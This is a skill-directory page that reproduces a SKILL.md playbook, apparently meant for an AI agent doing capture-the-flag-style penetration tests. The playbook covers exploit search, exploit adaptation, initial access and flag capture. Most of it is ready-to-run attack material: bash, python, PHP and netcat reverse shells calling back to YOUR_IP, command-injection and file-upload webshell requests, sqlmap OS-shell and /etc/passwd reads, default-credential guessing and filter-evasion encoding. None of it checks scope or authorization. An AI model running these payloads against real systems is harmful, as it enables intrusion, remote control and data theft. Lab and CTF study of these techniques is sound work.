exploitation-knowledge
Comprehensive knowledge about vulnerability exploitation and initial access. Provides expertise on finding and adapting exploits, adapting proof-of-concepts, gaining shells, and capturing user flags. Covers reverse shells, file uploads, SQL injection, and RCE vulnerabilities.
Best use case
exploitation-knowledge is best used when you need a repeatable AI agent workflow instead of a one-off prompt. It is especially useful for teams working in multi. Comprehensive knowledge about vulnerability exploitation and initial access. Provides expertise on finding and adapting exploits, adapting proof-of-concepts, gaining shells, and capturing user flags. Covers reverse shells, file uploads, SQL injection, and RCE vulnerabilities.
Comprehensive knowledge about vulnerability exploitation and initial access. Provides expertise on finding and adapting exploits, adapting proof-of-concepts, gaining shells, and capturing user flags. Covers reverse shells, file uploads, SQL injection, and RCE vulnerabilities.
Users should expect a more consistent workflow output, faster repeated execution, and less time spent rewriting prompts from scratch.
Practical example
Example input
Use the "exploitation-knowledge" skill to help with this workflow task. Context: Comprehensive knowledge about vulnerability exploitation and initial access. Provides expertise on finding and adapting exploits, adapting proof-of-concepts, gaining shells, and capturing user flags. Covers reverse shells, file uploads, SQL injection, and RCE vulnerabilities.
Example output
A structured workflow result with clearer steps, more consistent formatting, and an output that is easier to reuse in the next run.
When to use this skill
- Use this skill when you want a reusable workflow rather than writing the same prompt again and again.
When not to use this skill
- Do not use this when you only need a one-off answer and do not need a reusable workflow.
- Do not use it if you cannot install or maintain the related files, repository context, or supporting tools.
Installation
Claude Code / Cursor / Codex
Manual Installation
- Download SKILL.md from GitHub
- Place it in
.claude/skills/exploitation-knowledge/SKILL.mdinside your project - Restart your AI agent — it will auto-discover the skill
How exploitation-knowledge Compares
| Feature / Agent | exploitation-knowledge | Standard Approach |
|---|---|---|
| Platform Support | Not specified | Limited / Varies |
| Context Awareness | High | Baseline |
| Installation Complexity | Unknown | N/A |
Frequently Asked Questions
What does this skill do?
Comprehensive knowledge about vulnerability exploitation and initial access. Provides expertise on finding and adapting exploits, adapting proof-of-concepts, gaining shells, and capturing user flags. Covers reverse shells, file uploads, SQL injection, and RCE vulnerabilities.
Where can I find the source code?
You can find the source code on GitHub using the link provided at the top of the page.
SKILL.md Source
# Exploitation Knowledge Base
## Purpose
This knowledge base provides comprehensive exploitation methodologies and techniques. It covers converting discovered vulnerabilities into actual access, finding and adapting exploits, working in non-interactive environments, establishing stable shells, and capturing the user flag.
## Core Topics Covered
1. **Exploit Discovery**: Finding relevant exploits for discovered services
2. **Exploit Adaptation**: Modifying exploits to work in the target environment
3. **Initial Access**: Gaining command execution or shell access
4. **Shell Stabilization**: Upgrading to stable, usable shells
5. **User Flag Capture**: Locating and reading user.txt
## Tools Available
### Exploit Databases
- `searchsploit` - Local exploit-db search
- `msfconsole` - Metasploit framework
- Manual search: ExploitDB, GitHub, security advisories
### Shell Tools
- Reverse shells: bash, python, php, nc
- Web shells: PHP, ASP, JSP
- `rlwrap nc` - Stabilize shells
### Web Exploitation
- `sqlmap` - SQL injection
- `curl` - Manual web testing
- File upload bypass techniques
- Command injection testing
### Credential Testing
- `hydra` - Service brute force (limited use)
- `ssh`/`ftp`/`mysql` - Test discovered credentials
## Exploitation Workflow
### Phase 1: Multi-Source Exploit Discovery
**Core Principle:** Use multiple exploit sources in parallel - never rely on a single source.
**Layered Exploit Search:**
```bash
# Layer 1: Local database (fastest)
searchsploit "service version"
searchsploit CVE-YYYY-XXXXX
# If found → proceed to analysis
# If not found → immediately try Layer 2
# Layer 2: Metasploit framework
msfconsole -q -x "search type:exploit name:service_name; exit"
# If found → test with msfconsole
# If not found → immediately try Layer 3
# Layer 3: Online sources (GitHub, Google)
# GitHub API search (automated)
curl -s "https://api.github.com/search/repositories?q=CVE-YYYY-XXXXX+exploit" | jq -r '.items[].html_url'
# Google search (manual if needed)
# Search: "CVE-YYYY-XXXXX exploit poc github"
# Search: "service_name version exploit"
# Layer 4: Adapt or create custom exploit
# Based on vulnerability description/advisory
# Modify existing PoC for your environment
```
**Critical Rules:**
1. **Try all layers** - Don't stop at Layer 1 failure
2. **Parallel search** - If time allows, search multiple sources simultaneously
3. **Cross-validate** - If multiple exploits exist, try most reliable/recent first
4. **Track sources** - Record which source worked in `successful_paths`
### Phase 2: Exploit Analysis
Before running:
1. **Read the exploit code** - understand what it does
2. **Check requirements** - needed libraries, credentials
3. **Identify target parameters** - IP, port, payload location
4. **Plan adaptation** - what needs to be modified
### Phase 3: Exploit Adaptation
Common modifications needed:
#### A. Python Exploits
```python
# Original (interactive)
import sys
target = sys.argv[1]
shell = raw_input("Enter command: ")
# Adapted (non-interactive)
target = "10.10.10.1"
shell = "/bin/bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"
```
#### B. Metasploit Exploits
```bash
# Use non-interactive mode
msfconsole -q -x "use exploit/linux/http/webmin_backdoor; set RHOSTS 10.10.10.1; set LHOST YOUR_IP; run; exit"
```
#### C. Reverse Shell Payloads
```bash
# Bash reverse shell
bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'
# Python reverse shell
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("YOUR_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])'
# PHP reverse shell (for uploads)
<?php system("bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"); ?>
# NC reverse shell
nc YOUR_IP 4444 -e /bin/bash
# Or if -e not available:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc YOUR_IP 4444 >/tmp/f
```
### Phase 4: Listener Setup
Always start listener before triggering exploit:
```bash
# Simple listener
nc -lvnp 4444
# Stabilized listener with rlwrap
rlwrap nc -lvnp 4444
```
### Phase 5: Execution
Execute exploit and verify success:
```bash
# Run exploit
python3 exploit.py
# If successful, you should see connection in listener
# Test with:
id
whoami
pwd
```
### Phase 6: Shell Stabilization
Once you have basic shell:
```bash
# Upgrade to TTY shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
# Then press Ctrl+Z
stty raw -echo; fg
export TERM=xterm
```
## Common Attack Vectors
### 1. File Upload Vulnerabilities
```bash
# Test simple upload
curl -F "file=@shell.php" http://TARGET/upload.php
# Bypass restrictions
# Try: shell.php.jpg, shell.phtml, shell.php5, shell.PhP
# Find uploaded file
gobuster dir -u http://TARGET/uploads -x php,phtml
# Trigger shell
curl http://TARGET/uploads/shell.php?cmd=id
```
### 2. SQL Injection
```bash
# Test for SQLi
sqlmap -u "http://TARGET/page.php?id=1" --batch --level=5 --risk=3
# If found, try to get shell
sqlmap -u "http://TARGET/page.php?id=1" --os-shell
# Or read files
sqlmap -u "http://TARGET/page.php?id=1" --file-read=/etc/passwd
```
### 3. Command Injection
```bash
# Test common injection points
curl "http://TARGET/ping.php?ip=127.0.0.1;id"
curl "http://TARGET/ping.php?ip=127.0.0.1|whoami"
curl "http://TARGET/ping.php?ip=127.0.0.1`whoami`"
# Get reverse shell
curl "http://TARGET/ping.php?ip=;bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"
```
### 4. Public Exploits
```bash
# If you find CVE-2021-XXXX is applicable
# Search for PoC
searchsploit CVE-2021-XXXX
# Or check GitHub
curl -s "https://api.github.com/search/repositories?q=CVE-2021-XXXX" | jq -r '.items[].html_url'
# Download and adapt
wget https://raw.githubusercontent.com/user/repo/exploit.py
# Modify target IP, ports, payload
# Run
python3 exploit.py
```
### 5. Default Credentials
Test these FIRST before complex exploits:
```bash
# SSH
ssh admin@TARGET # Try: admin/admin, root/root, root/toor
# FTP
ftp TARGET # Try: anonymous/anonymous, admin/admin
# MySQL
mysql -h TARGET -u root -p # Try: root/'', root/root
# Web Admin Panels
# Try: admin/admin, admin/password, admin/admin123
```
## Environment Detection and Payload Adaptation
**Core Principle:** Always probe environment before choosing exploitation method.
### Pre-Exploitation Environment Check
**Check your attacking machine:**
```bash
# Check critical tools and versions
java -version 2>&1 | head -1 # For JNDI, deserialization exploits
python3 --version # For exploit scripts
gcc --version # For compiling exploits
which nc netcat ncat # For reverse shells
# Record environment limitations
# Example: If Java > 8, JNDI injection will be blocked
# Example: If no gcc, can't compile C exploits → need precompiled or script-based
```
**Check target environment (after gaining RCE):**
```bash
# Via webshell or command injection, test what's available:
which nc python python3 php perl bash sh curl wget
# Test specific versions if exploit requires them
python --version
php --version
# Check writable directories
ls -la /tmp /dev/shm /var/tmp
# Check for filtering/WAF
# Try: echo test
# Try: cat /etc/passwd
# If blocked, try base64 encoding or other bypass
```
### Adaptive Payload Selection
**Decision Tree for Reverse Shells:**
```
1. Do we have RCE?
└─ Yes → Proceed to step 2
└─ No → Get RCE first (file upload, SQLi, etc.)
2. Check target environment
└─ nc available? → Use nc reverse shell
└─ python available? → Use python reverse shell
└─ php available? (web server) → Use PHP reverse shell
└─ bash available? → Use bash /dev/tcp method
└─ None? → Upload binary or use alternative method
3. Test for filtering
└─ Try basic command: echo test
└─ If special chars blocked (/, &, >, |) → Use encoding:
- Base64: echo BASE64 | base64 -d | bash
- Hex encoding
- URL encoding
└─ If commands filtered by keyword → Try alternatives:
- cat → head, tail, nl, more, less
- nc → /dev/tcp, telnet, socat
```
**Example Adaptive Flow:**
```bash
# Step 1: Gained RCE via file upload, test environment
curl "http://TARGET/shell.php?cmd=which nc"
# Response: empty (nc not available)
# Step 2: Try python
curl "http://TARGET/shell.php?cmd=which python3"
# Response: /usr/bin/python3 (available!)
# Step 3: Use python reverse shell
curl "http://TARGET/shell.php?cmd=python3 -c 'import socket,subprocess...'"
# If that fails with error, diagnose:
# - Syntax error? → Check for character filtering
# - No response? → May be WAF blocking
# → Try base64 encoded version
```
### Failure Diagnosis for Exploits
**When exploit fails, systematically diagnose:**
```bash
# Type 1: No response at all
Possible causes:
- Firewall blocking
- Wrong target IP/port
- Service actually not vulnerable
Action: Verify target is reachable, try different port, re-check vulnerability
# Type 2: Error message returned
Possible causes:
- Missing dependency (library, tool)
- Wrong syntax for target environment
- Version mismatch
Action: Read error carefully, install missing deps, adapt exploit code
# Type 3: Exploit runs but no shell
Possible causes:
- Payload blocked by filtering
- Target missing required tool (nc, python)
- Firewall blocking outbound connections
Action: Try different payload encoding, use different shell method, test with simple command first
# Type 4: Tool-specific failure (e.g., Metasploit fails)
Possible causes:
- Bug in Metasploit module
- Configuration issue
Action: Try alternative exploit source (GitHub, manual PoC), check module options
```
**Record diagnosis in state:**
```bash
jq '.failed_attempts += [{
"exploit": "CVE-2021-12345",
"tool": "metasploit",
"failure_type": "no shell received",
"diagnosis": "target missing nc, switched to python payload",
"resolution": "used GitHub PoC with python reverse shell - success"
}]' .pentest-state.json
```
## Handling Non-Interactive Shells
Since you're in CLI-only environment:
### Execute Commands Without TTY
```bash
# Instead of interactive shell, use command execution
curl http://TARGET/shell.php?cmd=cat+/etc/passwd
# Chain commands
curl http://TARGET/shell.php?cmd=cd+/home;ls+-la
# Use semicolons
curl http://TARGET/shell.php?cmd=id;whoami;pwd
```
### Background Reverse Shells
```bash
# Start listener in background
nc -lvnp 4444 > shell-output.txt 2>&1 &
# Trigger exploit
python3 exploit.py
# Check output
cat shell-output.txt
# Send commands via named pipe
mkfifo /tmp/pipe
nc YOUR_IP 4444 < /tmp/pipe | /bin/bash > /tmp/pipe 2>&1 &
```
## User Flag Capture
Once you have command execution:
### 1. Locate User Flag
```bash
# Search for user.txt
find / -name "user.txt" 2>/dev/null
find /home -name "user.txt" 2>/dev/null
find /home -name "*.txt" 2>/dev/null
# Common locations
cat /home/*/user.txt
cat /home/user/user.txt
```
### 2. Read and Verify
```bash
# Read flag
cat /home/username/user.txt
# Verify format (should be 32-char hex)
cat /home/username/user.txt | wc -c # Should be 33 (32 + newline)
```
### 3. Update State
```bash
# Save to state file
USER_FLAG=$(cat /home/username/user.txt)
jq --arg flag "$USER_FLAG" '.flags.user = $flag' .pentest-state.json > tmp.json && mv tmp.json .pentest-state.json
```
## Troubleshooting Failed Exploits
### Common Issues
1. **"Connection refused"**
- Check listener is running: `netstat -tlnp | grep 4444`
- Verify firewall allows connections
- Try different port
2. **"Module not found" (Python)**
- Install: `pip3 install requests pycrypto`
- Or adapt code to remove dependency
3. **"Permission denied"**
- Exploit may need root privileges
- Try different vulnerability
4. **"Exploit works but no shell"**
- Check payload syntax
- Try different reverse shell method
- Verify target has bash/python/nc
5. **"Timeout" or "No response"**
- Target may have WAF/IDS
- Try encoding payload
- Use slower, stealthier approach
## Decision Tree
```
Found Vulnerability
│
├─ Is there a public exploit?
│ ├─ Yes → Search searchsploit/GitHub
│ │ → Adapt and run
│ └─ No → Can you write custom exploit?
│ → Develop PoC
│
├─ Initial Access Gained?
│ ├─ Yes → Capture user flag
│ │ → Proceed to privilege escalation
│ └─ No → Try alternative vector
│ → Review reconnaissance data
│ → Attempt different service
│
└─ Stuck after 3 attempts?
→ Re-run reconnaissance
→ Look for overlooked services
→ Check for misconfigurations
```
## Output Format
After successful exploitation:
```json
{
"status": "user_access_gained",
"method": "File upload RCE via /uploads",
"access_level": "www-data",
"shell_type": "non-interactive webshell",
"user_flag": "a1b2c3d4e5f6g7h8i9j0k1l2m3n4o5p6",
"credentials_found": [],
"next_steps": "Privilege escalation required for root flag"
}
```
## Success Criteria
Success criteria:
1. ✅ Command execution achieved on target
2. ✅ User flag located and read
3. ✅ Flag is 32-character hexadecimal string
4. ✅ Access documented in state file
5. ✅ Ready to proceed to privilege escalation phase
## Key Principles
1. **Adapt exploits** - public exploits rarely work as-is
2. **Handle non-interactive** - CLI-only environment requires creativity
3. **Verify success** - always test access with `id`, `whoami`
4. **Capture flag** - don't proceed without user.txt content
5. **Document method** - save successful path for future reference
## Remember
- Try simple before complex (default creds before 0-days)
- Read exploit code before running (understand what it does)
- Non-interactive shells require different commands
- User flag MUST be captured before moving to privesc
- If stuck, revisit reconnaissance for missed vectorsRelated Skills
knowledge-base
专业的知识库管理系统,旨在解决“知识诅咒”和认知偏差问题。通过显式化隐性知识、扫描代码提取领域概念、整合行业最佳实践,构建结构化的 Markdown 知识库。
notion-knowledge-capture
Capture conversations and decisions into structured Notion pages; use when turning chats/notes into wiki entries, how-tos, decisions, or FAQs with proper linking.
recursive-knowledge
Process large document corpora (1000+ docs, millions of tokens) through knowledge graph construction and stateful multi-hop reasoning. Use when (1) User provides a large corpus exceeding context limits, (2) Questions require connections across multiple documents, (3) Multi-hop reasoning needed for complex queries, (4) User wants persistent queryable knowledge from documents. Replaces brute-force document stuffing with intelligent graph traversal.
project-knowledge
Load project architecture and structure knowledge. Use when you need to understand how this project is organized.
reconnaissance-knowledge
Comprehensive knowledge about network reconnaissance and service enumeration. Provides methodologies for port scanning, service fingerprinting, web directory discovery, and vulnerability identification. Includes best practices for structured data collection.
privilege-escalation-knowledge
Comprehensive knowledge about Linux privilege escalation. Provides methodologies for enumerating and exploiting privesc vectors including SUID binaries, sudo permissions, capabilities, kernel exploits, cron jobs, and common misconfigurations. Includes systematic approach to capturing root flags.
knowledge
Display knowledge base status and recent learnings
azure-quotas
Check/manage Azure quotas and usage across providers. For deployment planning, capacity validation, region selection. WHEN: "check quotas", "service limits", "current usage", "request quota increase", "quota exceeded", "validate capacity", "regional availability", "provisioning limits", "vCPU limit", "how many vCPUs available in my subscription".
raindrop-io
Manage Raindrop.io bookmarks with AI assistance. Save and organize bookmarks, search your collection, manage reading lists, and organize research materials. Use when working with bookmarks, web research, reading lists, or when user mentions Raindrop.io.
zlibrary-to-notebooklm
自动从 Z-Library 下载书籍并上传到 Google NotebookLM。支持 PDF/EPUB 格式,自动转换,一键创建知识库。
discover-skills
当你发现当前可用的技能都不够合适(或用户明确要求你寻找技能)时使用。本技能会基于任务目标和约束,给出一份精简的候选技能清单,帮助你选出最适配当前任务的技能。
web-performance-seo
Fix PageSpeed Insights/Lighthouse accessibility "!" errors caused by contrast audit failures (CSS filters, OKLCH/OKLAB, low opacity, gradient text, image backgrounds). Use for accessibility-driven SEO/performance debugging and remediation.